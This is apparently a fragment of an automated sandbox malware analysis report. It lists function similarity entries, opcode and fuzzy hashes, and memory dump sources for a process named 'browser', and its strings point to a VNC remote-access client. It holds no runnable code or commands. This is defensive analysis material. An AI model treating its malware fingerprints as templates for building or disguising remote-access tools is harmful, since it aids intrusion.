                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClassMessageNamePost
                                                      • String ID: WindowsScreenSaverClass
                                                      • API String ID: 650004062-352026012
                                                      • Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                      • Instruction ID: d9da13affb5913dc74b3f49c5dc0620bf79880526e64ad712b5f5dd08913d17a
                                                      • Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                      • Instruction Fuzzy Hash: D5014F35628B8581E771AB31F9547EAB3A0FB8DB84F801131CA8C0BB58DE2CF156CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageObjectSendSingleWait
                                                      • String ID: vncclient.cpp : client Kill() called
                                                      • API String ID: 353115698-1198714380
                                                      • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                      • Instruction ID: 369783f7db7e5b6272d5e040594c9b6ae0eb1f9ac1685930f0b880eaca831d4c
                                                      • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                      • Instruction Fuzzy Hash: A9017C3262898281FB68AF35E4853F9A361EF85B74F885231C63C067D5CF38E494C390
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: getpeernameinet_ntoa
                                                      • String ID: <unavailable>
                                                      • API String ID: 1982201544-1096956887
                                                      • Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                      • Instruction ID: 39d3b1b5e02c8fd6bbb3267f86f16255732861e1bb57bfa0da35f48df4560235
                                                      • Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                      • Instruction Fuzzy Hash: 77F0FE6562864186EA70AB30E4511A9B370FB88798FC01535D64E06724DF3CE1458B10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast
                                                      • String ID:
                                                      • API String ID: 918212764-0
                                                      • Opcode ID: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                      • Instruction ID: f2ee289ddc8ed1fe5969db8ede7c3c2e282eabb6d1dca295f04083e4c5121994
                                                      • Opcode Fuzzy Hash: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                      • Instruction Fuzzy Hash: AC215E32A29A5686EB60AF34D4943B9B3A0FF84B44F902531DA4E43754DF3CF885C360
                                                      APIs
                                                      • TlsGetValue.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC7338
                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC7352
                                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC739C
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC73E3
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterInitializeLeaveValue
                                                      • String ID:
                                                      • API String ID: 3200804837-0
                                                      • Opcode ID: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
                                                      • Instruction ID: fa3fc94d5c1ded0afc3146dcfbf6bc290212ee93074ef598e7df49a8cf921716
                                                      • Opcode Fuzzy Hash: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
                                                      • Instruction Fuzzy Hash: 43213032A29B5291EB24AF35E9501B8B3A4FF49B94F886535DA4D03760DF3CF4A5C320